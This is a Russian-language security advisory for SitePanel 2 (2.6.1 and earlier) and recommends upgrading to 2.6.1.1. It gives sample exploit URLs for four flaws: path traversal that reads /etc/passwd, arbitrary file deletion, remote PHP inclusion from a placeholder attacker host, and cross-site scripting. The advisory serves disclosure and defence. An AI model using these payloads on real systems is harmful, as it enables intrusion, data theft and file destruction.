Дата публикации: | 06.05.2005 |
Всего просмотров: | 1181 |
Опасность: | Высокая |
Наличие исправления: | |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | |
Воздействие: | |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | |
Уязвимые версии: SitePanel 2 2.6.1 и более ранние версии
Описание: 1. Обход каталога возможен из-за недостаточной обработки параметра lang. Удаленный пользователь может с помощью специально сформированного URL просмотреть произвольные файлы на системе. Пример: http://[target]/users/index.php?lang=en.inc/../../../../../../etc/pa sswd%00 2. Удаленный авторизованный пользователь может также удалить произвольные файлы на системе. Пример: http://[target]/admin/5.php?do=rmattach&rm=yes&id=../index.php 3. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный PHP сценарий на целевой системе с привилегиями web сервера. Пример: http://[target]/users/main.php?p=http://attacker 4. Межсайтовый скриптинг возможен из-за недостаточной фильтрации входных данных. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Пример:
http://[target]/users/main.php?p =5&do=2&v=177%22%3E[XSS] URL производителей: www.sitepanel2.com Решение: Установите последнюю версию (2.6.1.1) от производителя. |
|
Ссылки: | Multiple SitePanel2 Vulnerabilities |